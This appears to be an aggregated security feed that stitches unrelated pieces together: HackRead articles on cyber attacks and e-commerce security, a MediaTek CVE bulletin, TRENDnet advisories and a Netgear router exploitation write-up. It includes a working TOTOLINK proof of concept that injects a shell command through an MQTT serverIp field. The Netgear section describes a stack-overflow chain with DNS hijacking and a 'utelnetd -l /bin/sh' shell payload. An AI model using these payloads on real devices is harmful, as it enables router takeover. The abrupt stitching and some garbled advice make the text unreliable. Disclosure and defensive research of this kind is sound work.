By Owais Sultan
Cyber attacks are a real and common issue surrounding businesses and personal accounts, especially if they have sensitive…
This is a post from HackRead.com Read the original post: Combating the Ever-Increasing Cyber Attacks in 2023

**Cyber attacks** are a real and common issue surrounding businesses and personal accounts, especially if they have sensitive information nowadays. In recent years, there have been multiple data breaches and hackers evolving their cyber attack processes to achieve their goals, which is why everyone should evolve their cyber security.

There are multiple ways to protect ourselves and our companies from cyber attacks, but we must first understand the risks we face. When discussing cyber security, we must consider our passwords, software, websites, browsers, and even Wi-Fi.

**What risks do cyber attacks involve?**

According to **CyberGhost’s guide**, the easier targets for cybercriminals are employees, as they can access businesses’ software and systems. It has been proven that cyber attacks have been increasing due to the pandemic and online work.

Some of the risks that cyber attacks involve are:

*   Data breaches
*   Disrupted devices
*   Paralyzed systems
*   Bank account hacks
*   Electrical blackouts
*   Failure of equipment

There are many risks from cyber attacks, which is why it is so important to have good cyber security.

**Top 5 Security Risks in 2023**

1.   **Ransomware**

A **ransomware attack** has proven to be the most expensive type of cyber attack for victims. Ransomware encrypts victims’ information and restricts users’ access until they pay to get it unlocked. To avoid this kind of infection, you must prevent spam, malvertising, phishing, etc.

2.  **API Attacks**

**API attacks** work through automated threats, such as bot attacks or access violations, which can lead to data loss, stolen private information, or even service disruption. To prevent these kinds of attacks, it is recommended to use antiviruses, VPNs, and ad blockers.

3.  **Social Engineering Attacks**

**Social engineering attacks** are made through psychological manipulation, tricking victims into making security mistakes, such as giving away sensitive information. That can be done with baiting, pretexting, phishing, etc. To prevent these attacks, we must ignore emails and attachments from suspicious sources, use a multifactor authenticator, be wary of tempting offers, and use an antivirus. 

4.  **Supply Chain Attacks**

**Supply chain attacks** usually target organizations to hack their supply deliveries and steal them to sell to third-party vendors. They achieve this thanks to malware installation and malware, so if we want to stay safe, we must use antivirus, malware software, and a VPN, and always connect to secure Wi-Fi.

5.  **Fileless Malware Attacks** 

**Fileless malware** is one of the hardest malware to detect since it leaves no footprints and relies on no files. Victims usually get this malware by clicking on suspicious links, which leads to the downloading of malware to upload all sensitive information to their database.

So, even if it’s hard to trace, we can easily get protected by using an antivirus, avoiding spam, and activating a VPN and an Ad Blocker.

**How can we identify cybersecurity threats?**

**Cyber attacks have been categorized** into three different categories, depending on their objective: financial gain, corporate espionage, or patent theft. Once we know this, we can comprehend how to identify them, since they will always seek access to your devices. They gain access by the following:

*   Malware
*   Phishing
*   Trojans
*   Ransomware
*   Spear Phishing
*   Denial of Service 
*   Attacks on IoT Devices
*   “Man in the Middle” attack

This kind of attack can easily be prevented by not clicking, downloading, logging in, or giving access to others to your devices, accounts, and emails.

**How to prevent cyber attacks?**

Preventing cyber attacks is easy, but it requires patience and consistency, as results will improve as we evolve our cyber health. If you’d like to **improve your cyber security**, then you should implement the following activities on your devices.

1.  Use a VPN.
2.  Activate an ad blocker. 
3.  Use password managers.
4.  Invest in a good antivirus.
5.  Use trustworthy browsers.
6.  Don’t share accounts with others.
7.  Activate multi-factor authenticator.
8.  Always use the last versions of software and apps
9.  Use strong passwords and change them every four months.
10.  Separate work and personal information and account access.

If you follow these practices, you can be sure you have good cyber health. Still, you must keep researching new ways at least twice a year, since hackers keep developing new ways to attack as technology advances.

Also, it is important to **take care of Wi-Fi protection** and always run a malware and virus test if you use public Wi-Fi, as these are vulnerable ways of being hacked.

**5 activities to do as an employee/executive for cyber security**

1.   Ask/create cybersecurity training programs.
2.  Have different devices for both home and work usage.
3.  Perform a regular audit of cyber protection procedures.
4.  Install antivirus and VPN software on all work devices. 
5.  Create a backup of all employees’ and clients’ data.

Combating the Ever-Increasing Cyber Attacks in 2023

In vcu, there is a possible memory corruption due to improper locking. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07519159; Issue ID: ALPS07519159.

**February 2023 Product Security Bulletin**

Published 2023-02-06

The MediaTek Product Security Bulletin contains details of security vulnerabilities affecting MediaTek Smartphone, Tablet, AIoT, Smart display, Smart platform, OTT and Wi-Fi chipsets. Device OEMs have been notified of all the issues and the corresponding security patches for at least two months before publication.

The severity of the identified vulnerabilities was conducted based on the Common Vulnerability Scoring System version 3.1 (CVSS v3.1).

****Summary****

Severity

**CVEs**

High

CVE-2023-20602

Medium

CVE-2023-20604, CVE-2023-20605, CVE-2023-20606, CVE-2023-20607, CVE-2023-20608, CVE-2023-20609, CVE-2023-20610, CVE-2023-20611, CVE-2023-20612, CVE-2023-20613, CVE-2023-20614, CVE-2023-20615, CVE-2023-20616, CVE-2023-20618, CVE-2023-20619, CVE-2022-32642, CVE-2022-32643, CVE-2022-32654, CVE-2022-32655, CVE-2022-32656, CVE-2022-32663

****Details****

CVE

**CVE-2023-20602**

Title

Improper input validation in ged

Severity

High

Vulnerability Type

EoP

CWE

CWE-20 Improper Input Validation

Description

In ged, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6735, MT6737, MT6739, MT6753, MT6757, MT6761, MT6763, MT6765, MT6768, MT6771, MT6779, MT6781, MT6785, MT6833, MT6853, MT6855, MT6873, MT6877, MT6879, MT6885, MT6889, MT6893, MT6895, MT6983

Affected Software Versions

Android 10.0, 11.0, 12.0, 13.0

CVE

**CVE-2023-20604**

Title

Improper input validation in ged

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-20 Improper Input Validation

Description

In ged, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6735, MT6737, MT6739, MT6753, MT6757, MT6761, MT6763, MT6765, MT6768, MT6771, MT6779, MT6781, MT6785, MT6833, MT6853, MT6855, MT6873, MT6877, MT6879, MT6885, MT6889, MT6893, MT6895, MT6983, MT8167, MT8362A

Affected Software Versions

Android 11.0, 12.0, 13.0

CVE

**CVE-2023-20605**

Title

Improper input validation in keyinstall

Severity

Medium

Vulnerability Type

ID

CWE

CWE-20 Improper Input Validation

Description

In keyinstall, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6580, MT6731, MT6735, MT6737, MT6739, MT6753, MT6757, MT6757C, MT6757CD, MT6757CH, MT6761, MT6762, MT6763, MT6765, MT6768, MT6769, MT6771, MT6779, MT6781, MT6785, MT6789, MT6833, MT6853, MT6853T, MT6855, MT6873, MT6875, MT6877, MT6879, MT6883, MT6885, MT6889, MT6891, MT6893, MT6895, MT6983, MT8185, MT8321, MT8385, MT8666, MT8667, MT8765, MT8766, MT8768, MT8786, MT8788, MT8789, MT8791, MT8791T, MT8797

Affected Software Versions

Android 11.0, 12.0, 13.0

CVE

**CVE-2023-20606**

Title

Improper input validation in apusys

Severity

Medium

Vulnerability Type

ID

CWE

CWE-20 Improper Input Validation

Description

In apusys, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6879, MT6895, MT6983

Affected Software Versions

Android 12.0, 12.1

CVE

**CVE-2023-20607**

Title

Improper synchronization in ccu

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-662 Improper Synchronization

Description

In ccu, there is a possible memory corruption due to a race condition. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6765, MT6768, MT8786

Affected Software Versions

Android 11.0, 12.0

CVE

**CVE-2023-20608**

Title

Improper synchronization in display drm

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-662 Improper Synchronization

Description

In display drm, there is a possible use after free due to a race condition. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6761, MT6765, MT6768, MT6779, MT6781, MT6785, MT6789, MT6833, MT6853, MT6855, MT6873, MT6877, MT6879, MT6883, MT6885, MT6889, MT6893, MT6895, MT6983, MT8168, MT8365, MT8675

Affected Software Versions

Android 11.0, 12.0, 13.0

CVE

**CVE-2023-20609**

Title

Out-of-bounds read in ccu

Severity

Medium

Vulnerability Type

ID

CWE

CWE-125 Out-of-bounds Read

Description

In ccu, there is a possible out of bounds read due to a logic error. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6833, MT6853, MT6873, MT6877, MT6885, MT6893, MT8768, MT8786, MT8791, MT8797

Affected Software Versions

Android 11.0, 12.0, 13.0

CVE

**CVE-2023-20610**

Title

Improper synchronization in display drm

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-662 Improper Synchronization

Description

In display drm, there is a possible memory corruption due to a race condition. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6761, MT6765, MT6768, MT6779, MT6781, MT6785, MT6789, MT6833, MT6853, MT6855, MT6873, MT6877, MT6879, MT6883, MT6885, MT6889, MT6893, MT6895, MT6983, MT8168, MT8365, MT8675

Affected Software Versions

Android 11.0, 12.0, 13.0

CVE

**CVE-2023-20611**

Title

Improper synchronization in gpu

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-662 Improper Synchronization

Description

In gpu, there is a possible use after free due to a race condition. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6580, MT6731, MT6735, MT6737, MT6739, MT6753, MT6757, MT6757C, MT6757CD, MT6757CH, MT6761, MT6762, MT6763, MT6765, MT6768, MT6769, MT6771, MT6779, MT6781, MT6785, MT6789, MT6833, MT6853, MT6853T, MT6855, MT6873, MT6875, MT6877, MT6879, MT6883, MT6885, MT6889, MT6891, MT6893, MT6895, MT6983, MT8168, MT8365

Affected Software Versions

Android 12.0, 13.0

CVE

**CVE-2023-20612**

Title

Improper input validation in ril

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-20 Improper Input Validation

Description

In ril, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6739, MT6761, MT6762, MT6765, MT6768, MT6769, MT6771, MT6779, MT6781, MT6785, MT6789, MT6833, MT6853, MT6855, MT6873, MT6875, MT6877, MT6879, MT6883, MT6885, MT6889, MT6891, MT6893, MT6895, MT6983, MT8321, MT8385, MT8765, MT8766, MT8768, MT8786, MT8788, MT8789, MT8791, MT8791T, MT8797

Affected Software Versions

Android 11.0, 12.0, 13.0

CVE

**CVE-2023-20613**

Title

Improper input validation in ril

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-20 Improper Input Validation

Description

In ril, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6739, MT6761, MT6762, MT6765, MT6768, MT6769, MT6771, MT6779, MT6781, MT6785, MT6789, MT6833, MT6853, MT6855, MT6873, MT6875, MT6877, MT6879, MT6883, MT6885, MT6889, MT6891, MT6893, MT6895, MT6983, MT8321, MT8385, MT8765, MT8766, MT8768, MT8786, MT8788, MT8789, MT8791, MT8791T, MT8797

Affected Software Versions

Android 11.0, 12.0, 13.0

CVE

**CVE-2023-20614**

Title

Out-of-bounds write in ril

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-787 Out-of-bounds Write

Description

In ril, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6739, MT6761, MT6762, MT6765, MT6768, MT6769, MT6771, MT6779, MT6781, MT6785, MT6789, MT6833, MT6853, MT6853T, MT6855, MT6873, MT6875, MT6877, MT6879, MT6883, MT6885, MT6889, MT6891, MT6893, MT6895, MT6983, MT8321, MT8385, MT8765, MT8766, MT8768, MT8786, MT8788, MT8789, MT8791, MT8791T, MT8797

Affected Software Versions

Android 11.0, 12.0, 13.0

CVE

**CVE-2023-20615**

Title

Out-of-bounds write in ril

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-787 Out-of-bounds Write

Description

In ril, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6739, MT6761, MT6762, MT6765, MT6768, MT6769, MT6771, MT6779, MT6781, MT6785, MT6789, MT6833, MT6853, MT6855, MT6873, MT6875, MT6877, MT6879, MT6883, MT6885, MT6889, MT6891, MT6893, MT6895, MT6983, MT8321, MT8385, MT8765, MT8766, MT8768, MT8786, MT8788, MT8789, MT8791, MT8791T, MT8797

Affected Software Versions

Android 11.0, 12.0, 13.0

CVE

**CVE-2023-20616**

Title

Access of resource using incompatible type ('type confusion') in ion

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-843 Access of Resource Using Incompatible Type ('Type Confusion')

Description

In ion, there is a possible out of bounds read due to type confusion. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6580, MT6735, MT6737, MT6739, MT6753, MT6757, MT6757C, MT6757CD, MT6757CH, MT6761, MT6762, MT6763, MT6765, MT6768, MT6769, MT6771, MT6779, MT6781, MT6785, MT6833, MT6853, MT6853T, MT6873, MT6875, MT6877, MT6883, MT6885, MT6889, MT6891, MT6893, MT8168, MT8183, MT8321, MT8365, MT8385, MT8666, MT8675, MT8765, MT8766, MT8768, MT8786, MT8788, MT8791T, MT8797

Affected Software Versions

Android 11.0, 12.0

CVE

**CVE-2023-20618**

Title

Out-of-bounds read in vcu

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-125 Out-of-bounds Read

Description

In vcu, there is a possible memory corruption due to improper locking. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6761, MT6762, MT6768, MT6769, MT6779, MT6781, MT6785, MT6789, MT6833, MT6853, MT6853T, MT6873, MT6875, MT6877, MT6883, MT6885, MT6889, MT6891, MT6893, MT8185, MT8786, MT8789, MT8791, MT8797

Affected Software Versions

Android 11.0, 12.0, 13.0

CVE

**CVE-2023-20619**

Title

Use after free in vcu

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-416 Use After Free

Description

In vcu, there is a possible memory corruption due to improper locking. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6761, MT6762, MT6768, MT6769, MT6779, MT6781, MT6785, MT6789, MT6833, MT6853, MT6853T, MT6873, MT6875, MT6877, MT6883, MT6885, MT6889, MT6891, MT6893, MT8185, MT8786, MT8789, MT8791, MT8797

Affected Software Versions

Android 11.0, 12.0, 13.0

CVE

**CVE-2022-32642**

Title

Improper synchronization in ccd

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-662 Improper Synchronization

Description

In ccd, there is a possible memory corruption due to a race condition. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6879, MT6895, MT6983

Affected Software Versions

Android 12.0

CVE

**CVE-2022-32643**

Title

Improper synchronization in ccd

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-662 Improper Synchronization

Description

In ccd, there is a possible use after free due to a race condition. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6879, MT6895, MT6983

Affected Software Versions

Android 12.0

CVE

**CVE-2022-32654**

Title

Improper input validation in Wi-Fi driver

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-20 Improper Input Validation

Description

In Wi-Fi driver, there is a possible undefined behavior due to incorrect error handling. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT5221, MT7603, MT7613, MT7615, MT7622, MT7628, MT7629, MT7663, MT7668, MT7682, MT7686, MT7687, MT7697, MT7902, MT7915, MT7916, MT7921, MT7933, MT7981, MT7986, MT8167S, MT8175, MT8362A, MT8365, MT8385, MT8518S, MT8532, MT8695, MT8696, MT8788

Affected Software Versions

7.6.6.0

CVE

**CVE-2022-32655**

Title

Improper input validation in Wi-Fi driver

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-20 Improper Input Validation

Description

In Wi-Fi driver, there is a possible undefined behavior due to incorrect error handling. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT5221, MT7603, MT7613, MT7615, MT7622, MT7628, MT7629, MT7663, MT7668, MT7682, MT7686, MT7687, MT7697, MT7902, MT7915, MT7916, MT7921, MT7933, MT7981, MT7986, MT8167S, MT8175, MT8362A, MT8365, MT8385, MT8518S, MT8532, MT8695, MT8696, MT8788

Affected Software Versions

7.6.6.0

CVE

**CVE-2022-32656**

Title

Improper input validation in Wi-Fi driver

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-20 Improper Input Validation

Description

In Wi-Fi driver, there is a possible undefined behavior due to incorrect error handling. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT5221, MT7603, MT7613, MT7615, MT7622, MT7628, MT7629, MT7663, MT7668, MT7682, MT7686, MT7687, MT7697, MT7902, MT7915, MT7916, MT7921, MT7933, MT7981, MT7986, MT8167S, MT8175, MT8362A, MT8365, MT8385, MT8518S, MT8532, MT8695, MT8696, MT8788

Affected Software Versions

7.6.6.0

CVE

**CVE-2022-32663**

Title

Null pointer dereference in Wi-Fi driver

Severity

Medium

Vulnerability Type

DoS

CWE

CWE-476 NULL Pointer Dereference

Description

In Wi-Fi driver, there is a possible system crash due to null pointer dereference. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT5221, MT7603, MT7613, MT7615, MT7622, MT7628, MT7629, MT7668, MT7902, MT7915, MT7916, MT7921, MT7981, MT7986, MT8167S, MT8175, MT8362A, MT8365, MT8385, MT8518S, MT8532, MT8788

Affected Software Versions

7.6.6.1

****Vulnerability Type Definition****

Abbreviation

**Definition**

RCE

Remote Code Execution

EoP

Elevation of Privilege

ID

Information Disclosure

DoS

Denial of Service

N/A

Classification not available

****Versions****

**Version**

**Date**

**Description**

1.0

February 6, 2023

Bulletin published.

****Notes****

Information above is generated only at the time of creation of this Security Bulletin. The list of affected chipsets could be not complete. For any further information, device OEMs can reach your MediaTek contact person if needed.

If you want to report a security vulnerability in MediaTek chipsets or products, please go to Report Security Vulnerability page on MediaTek website.

CVE-2023-20619: February 2023

A command injection vulnerability in the serverIp parameter in the function updateWifiInfo of TOTOLINK T8 V4.1.5cu allows attackers to execute arbitrary commands via a crafted MQTT packet.

A command injection vulnerability in the function updateWifiInfo of TOTOLINK Technology routers T8 V4.1.5cu allows attackers to execute arbitrary commands via a crafted MQTT packet.

In function updateWifiInfo,The "serverIp" parameter does not filter user input, which can cause command injection vulnerabilities

    import paho.mqtt.client as mqtt
    
    client = mqtt.Client()
    client.connect("192.168.0.1",1883,60)
    client.publish("totolink/router/updateWifiInfo", b'{"newMd5":"1","serverIp":";ls>/tmp/updateWifiInfo.txt;"}')

CVE-2023-24157: CVE-vulns/updateWifiInfo.md at main · Double-q1015/CVE-vulns

The use of the cyclic redundancy check (CRC) algorithm for integrity check during firmware update makes TRENDnet TV-IP651WI Network Camera firmware version v1.07.01 and earlier vulnerable to firmware modification attacks. An attacker can conduct a man-in-the-middle (MITM) attack to modify the new firmware image and bypass the checksum verification.

*   TWG-431BR VPN ROUTER AND TEW-740APBO V3.XR WIRELESS ACCESS POINT AUTHENTICATED COMMAND INJECTION VULNERABILITY AND KNOWN VULNERABILITIES IN CLI  
    1/26/2023
*   TRENDnet is aware of the command injection vulnerability and known vulnerabilities in CLI with TWG-431BR and TEW-740APBO hardware version 3.xR. To exploit these vulnerabilities, the attacker would need to know the device's management interface login user name and password. When exploited successfully, the attacker can compromise the device.
    
    TRENDnet has released firmware updates to address these vulnerabilities
    

*   TEW-820AP WIRELESS AC EASY-UPGRADER BUFFER OVERFLOW VULNERABILITIES  
    11/2/2022
*   TRENDnet is aware of the possible buffer overflow vulnerabilities involving the TEW-820AP Wireless AC Easy-Upgrader that could allow a malicious cyber attacker to take over the device and gain access to its operating system; however, this product has reached its End of Life (EoL) and End of Support, and TRENDnet is unable to provide support to verify or resolve these vulnerabilities.
    
    TRENDnet recommends customers to retire this product to prevent the risk of devices possibly connecting to it.
    

*   FRAGMENT and FORGE VULNERABILITIES (FRAGATTACKS) AGAINST SOME WI-FI DEVICES  
    8/17/2021
*   TRENDnet is aware of a series of published vulnerabilities known as FragAttacks in IEEE 802.11 standard Wi-Fi devices. The affected products are mainly wireless Access Points and Wireless Routers. To exploit these vulnerabilities, the attacker would need to connect to your Wi-Fi network. When exploited successfully, the attacker can extract data from the network, which can lead to additional exploits of your other network devices.
    
    TRENDnet has released firmware updates to address these vulnerabilities for the following products, please click on the link to go to the corresponding product’s download page.
    

*   TEW-714TRU TRAVEL ROUTER AUTHENTICATION BYPASS, HARD-CODED CREDENTIALS, AND UNRESTRICTED FILE WRITE VULNERABILITIES  
    8/17/2021
*   TRENDnet is aware of the vulnerabilities involving the TEW-714TRU Wireless Travel Router that could allow a malicious cyber attacker to take over the router and gain access to its operating system; however, this product has reached its End of Life (EoL) and End of Support, and TRENDnet is unable to provide support to resolve these vulnerabilities.
    
    TRENDnet recommends customers to retire this product to prevent the risk of devices possibly connecting to it.
    

*   WEB SERVER DIRECTORY TRAVERSAL ARBITRARY FILE ACCESS VULNERABILITY IN WEB SMART SWITCH TEG-30284 HARDWARE VERSION: 1.0R  
    7/22/2021
*   TRENDnet recently received a report stating a possible Web Server Directory Traversal Arbitrary File Access vulnerability in the 28-Port Gigabit Web Smart Switch, model TEG-30284, Hardware Version: 1.0R. An attacker may be able to exploit this issue to access sensitive information to aide in subsequent attacks.

CVE-2023-23120: Customer Support | TRENDnet

By Owais Sultan
Perhaps it should give us pause for thought that one of the biggest revolutions in commerce and society…
This is a post from HackRead.com Read the original post: The Basics of Ecommerce Cyber Security

Perhaps it should give us pause for thought that one of the biggest revolutions in commerce and society has also brought with it a whole new dimension of cyber security and cybercrime threats.

Of course, we are talking about the Internet revolution and everything it has led to. We now most often communicate across the Internet and we send all kinds of data, files, and documents. Some of that is pretty valuable, so cybercrime has come calling.

For the successful functioning of a business, online or offline, theft needs to be prevented. Traditionally, this probably only accounted for the theft of stock, but nowadays, it is more the theft of information that new businesses are most concerned about. The reason for this is simple enough: most businesses at least have an online dimension, and the only transaction that occurs online is the transfer of information.

You are never actually sending money when you make a bank transfer; you are sending information that affects the respective bank balances of those involved. This data can be stolen and converted into real financial gains for criminals.

This is why cybersecurity is vital for any online activity, from simple personal computer use right up to the online business. Any **internet-enabled device** purchased today will more often than not come with a full package of cybersecurity software, from firewalls to anti-virus software and sensitive data encryption. For businesses, this becomes doubly important because there is so much more at stake.

**The Arms Race**

The other thing about cyber security, especially for **e-commerce**, is that it is constantly evolving. Every other month, cyber-criminals refine their techniques and make use of more advanced tools and technologies. Hacking is a serious discipline carried out not only by criminals but also by government agencies tasked with enormous commitments, such as ensuring national security and fighting terrorism.

This is all you need to consider to see how vital cyber security is and how essential it is that it is constantly updated and refined. The criminals are doing that, so your business needs to do it too. It is an arms race, with each development on one side necessitating a responsive development on the other.

If you run a small e-commerce business, then this might all seem pretty daunting. Luckily, criminal interest in online companies scales in direct proportion to the size of the company and the valuable information and funds it handles. Therefore, your response should always be proportional. There is no need to break the bank for your small online art and craft store.

However, you can never neglect cyber security, and you can never rest for long before you must consider updating it. New technology could be the reason for updating, or it might be due to business growth. Both technological advancements by criminals and the growth of your business increase the risks.

**What Are the Threats to Ecommerce?**

So, assuming that you run a small- to mid-sized e-commerce venture (no large company needs an introduction to cyber security), what are the most common cyber risks associated with your endeavour?

Well, there are many. Cyberattacks can constitute the theft of information, but they can also lead to the loss of physical assets as well. When this latter threat is posed, it is usually because hackers have found a way to hack your digital order fulfilment system.

Cybercriminals do not just work with a keyboard and screen. For example, once information concerning your delivery routes has been stolen, it is all the easier for criminals to organize a heist – in the real world. 

Of course, though, simple security of information is where it all begins; risks tend to arise when information is transferred. For example, an insecure office network that is not protected against hackers allows for information and data to be stolen. Even simple things, such as password protection and administrator privileges, are forms of cyber security that address specific cyber risks.

Finally, there is a risk inherent in slow Internet speeds, too. A cyber attack can happen in the blink of an eye (electronic signals are transferred significantly faster than the blink of an eye), so you need to know when one has occurred and act as soon as possible. To shore up defence here, you might invest in network monitoring software and **WiFi 6** internet providers to establish a virtual guard tower.

**A Cyber Security Infrastructure **

So, that is the reality of the situation, and these are the threats you are up against. But, how do you get started in creating a robust cybersecurity infrastructure? Perhaps the best way to answer this question is to look at some cyber security practices and guidelines that cover the most important bases.

**Payment Card Industry Data Security Standard (PCI DSS) **

Often referred to solely as **PCI**, this is a widespread industry standard that ensures bank and card details are transferred securely. Here, we see the legal dimension of cybersecurity. Consulting the PCI is a great way to cover the most essential bases when it comes to security for this sensitive information.

**International Organization for Standardisation (ISO) **

No business staying on the right side of the law should consult the ISO and specifically the **ISO IEC 27002:2013** for cyber security. The internet doesn’t tend to respect borders, and neither does international regulations. Accordingly, the ISO allows businesses to ensure their practices are in line with everyone else’s. Achieving this certification is a good first step to take.

**Personal Data**

Personal data is a necessarily broad category that includes any data related to a specific person. The aforementioned card details would be an example, as would a customer’s address, or simply their name. There are several regulations concerning this, the most important of which is probably the **GDPR**.

**HTTPS Authentication **

What is the difference between **HTTP and HTTPS**? Most simply, the latter is the former with encryption added. You will recognize these characters from the beginning of every web address you visit in your browser. HTTPS means that the data has been encrypted, meaning it cannot be accessed by any intermediaries. Having HTTPS in your URL is also a trust indicator for customers, especially because bank transfers often have their specific web address when underway.

**Conclusion **

You shouldn’t see the strong **legal regulation of cyber security** as a bad thing. Sure, the law will require you to toe the line, but this is necessary. The alternative could be far worse for your business. Furthermore, the number of helpful compliance guidelines can let you know from the outset what you need to invest in before you start trading, giving you peace of mind thereafter.

The Basics of Ecommerce Cyber Security

Netgear routers R7000P before v1.3.3.154, R6900P before v1.3.3.154, R7960P before v1.4.4.94, and R8000P before v1.4.4.94 were discovered to contain a pre-authentication stack overflow.

*   Product links: https://www.netgear.com/support/product/r7000p.aspx
*   Version: < 1.3.3.154
*   Author: Jean-Jamil Khalife

**Vulnerable models**

**Nighthawk WiFi Mesh Systems**

*   MR60 fixed in firmware version 1.1.7.132
*   MS60 fixed in firmware version 1.1.7.132

**Routers**

*   R6900P fixed in firmware version 1.3.3.154
*   R7000P fixed in firmware version 1.3.3.154
*   R7960P fixed in firmware version 1.4.4.94
*   R8000P fixed in firmware version 1.4.4.94

**Disclosure Timeline**

*   2022-07-22 Netgear contacted
*   2022-11-01 Fix integrated

**Introduction**

Pre-auth remote code execution vulnerability found in the NETGEAR Nighthawk r7000p on the WAN interface.

Nighthawk R7000P is a popular dual-bank WiFi router advertised with gaming-focused features, smart parental controls, and internal hardware that is sufficiently powerful to accommodate the needs of home power users.

The vulnerability resides in the **/tmp/media/nand/router-analytics/aws\_json** binary, running on the Netgear router.

Due to increasing demand, we do vulnerability research on connected objects (router, camera, printer, etc.). One of the missions entrusted to us by our client was to find vulnerabilities on a selection of embedded devices, including the aforementioned Netgear Nightawk router. Several vulnerabilities have been discovered and will be published on the blog.

**Vulnerability**

This vulnerability can be remotely exploited by an attacker on the WAN side of the router, without authentication. The **aws\_json** daemon fetches json data from a webserver and a buffer overflow can be triggered when parsing this content.

By placing a malicious json content in a webserver and redirecting the router to download it (either by DNS redirection or TCP redirection), an attacker can execute arbitrary code. As aws\_json runs under the root user, the attacker gains full privileges on the router.

aws\_json is a program that connects to the domain devicelocation.ngxcld.com when the router starts. It sends an HTTP GET request at the address **https://devicelocation.ngxcld.com/device-location/resolve** to fetch information about the device location.

The server reponse is a json content that specifies information like city, country, etc.

We noticed that the curl request is sent using the HTTPS protocol. However, the **\-k** option given to curl explicitly prevents certificate signature and CommonName veritication. In other words, it means that anybody can impersonate the remote server. The json content will be written to file **/tmp/xCloud\_MAXmind** which is then parsed by aws\_json.

Here is the function body that parses the file:

However, the strcpy() function does not check the size of each field. It’s possible to write a large enough content leading to a stack buffer overflow.

**Exploitation****Overwriting function pointer**

We noted the binary is not ASLR compiled and the executable addresses are in the range 0x00008000 and 0x00027000. All other mapped modules run with randomized base addresses.

00008000-00027000 r-xp 00000000 1f:11 315        /tmp/media/nand/router-analytics/aws\_json

So, we needed to overwrite the PC register with an address in the binary, but also needed to put a null char at the end. This was made possible thanks to the strcpy() function.

**Finding gadget**

By exploring all gadgets pointing to the system() function, we can see at offset 0x00014E20:

SP points to contents that are not immediately controllable because it is located just after the return address. It is not possible to write there because strcpy() stops at the null byte. However, the vulnerability can be triggered twice, thanks to the multiple strcpy() calls. We can trigger in this order:

*   The first stack buffer overflow writes the payload to execute (here it is **utelnetd -l /bin/sh;**)
*   The second stack buffer overflow controls the PC value, redirecting execution flow

So, with these two overflows, we can call system() and execute our payload written on the stack.

To perform this attack, We configured a Raspberry Pi 4 as follows:

*   Configuration in router mode to intercept and modify requests (dnsmaq, dhcp server).
*   Edit dnsmasq.conf to hijack the DNS devicelocation.ngxcld.com: **address=/devicelocation.ngxcld.com/192.168.2.1**
*   Launch a custom HTTPS server in Python on 192.168.2.1 which will send the payload to aws\_json when the GET request is handled.

To summarize, we need to:

*   Plug the Netgear router WAN port into the ethernet port of the Raspberry Pi
*   Launch the HTTPS server.py
*   Boot the Netgear router and wait for a remote shell.
**Recommendations**

In general, it is important to force verification of HTTPS certificates by removing any -k (or --insecure) option from curl. Otherwise, it will be possible to intercept and modify on the fly via MiTM the packets that pass through, which can lead to the compromise of the router.

Also, it is necessary to replace strcpy() with safer functions -- such as strncpy() -- and to control the size of the processed data in order to avoid any buffer overflow.

**Conclusion**

This vulnerability research was requested by one of our customers who wanted to know if it was possible to compromise the company's routers.

The vulnerability we found made it possible to obtain a shell on the router which could subsequently lead to access to third-party subnets. Netgear is a major player in network devices for home and small/medium companies which makes their product a valuable target for hacker.

